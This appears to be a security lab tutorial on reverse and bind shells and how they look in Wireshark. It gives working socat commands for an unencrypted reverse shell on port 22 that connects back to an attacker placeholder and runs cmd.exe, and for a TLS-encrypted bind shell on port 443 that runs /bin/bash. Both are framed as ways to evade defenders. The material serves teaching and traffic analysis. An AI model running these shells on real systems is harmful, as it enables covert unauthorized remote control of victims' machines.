Wireshark and Encrypted Traffic
Scenario 1: Unencrypted Reverse Shell over Port 22
Objective:
Create a reverse shell using socat to simulate a connection that may fool defenders by using port 22 (commonly used for SSH).
Commands:
Kali Linux (Attacker's Listener):
socat -d -d TCP-LISTEN:22 STDOUTExplanation:
-d -d: Enables verbose/debug output.TCP-LISTEN:22: Listens on TCP port 22.STDOUT: Outputs received data to the screen.
Windows Victim (Reverse Shell):
socat.exe TCP:<attacker-ip>:22 EXEC:'cmd.exe',pipesExplanation:
Connects back to the attacker on port 22.
Executes
cmd.exe, piping input/output over the connection.
Defender's View (Wireshark):
Traffic on port 22 is expected to be SSH, which is encrypted.
However, this traffic is in cleartext, revealing:
Command inputs
Responses
Even passwords
🔴 Red Flag: Cleartext data on port 22 is suspicious.
Scenario 2: Encrypted Bind Shell over Port 443
Objective:
Use an OpenSSL-encrypted bind shell that mimics HTTPS traffic (port 443).
Generate a Self-signed Certificate:
openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 365 -out bind_shell.pemCombine key and cert if needed:
cat bind_shell.key bind_shell.pem > bind_shell.pemCommands:
Host (Target machine with bind shell):
socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bashExplanation:
OPENSSL-LISTEN:443: Listens on port 443 with SSL/TLS encryption.cert=bind_shell.pem: Uses the certificate to encrypt traffic.EXEC:/bin/bash: Binds the shell to the connection.fork: Handles multiple connections.
Attacker (Kali):
socat OPENSSL:<target-ip>:443,verify=0 STDIOConnects securely to the encrypted bind shell.
Defender's View (Wireshark):
Traffic on port 443 appears to be legitimate HTTPS.
Content is encrypted, so commands and responses are hidden.
More stealthy and harder for defenders to inspect.
Practicals
Last updated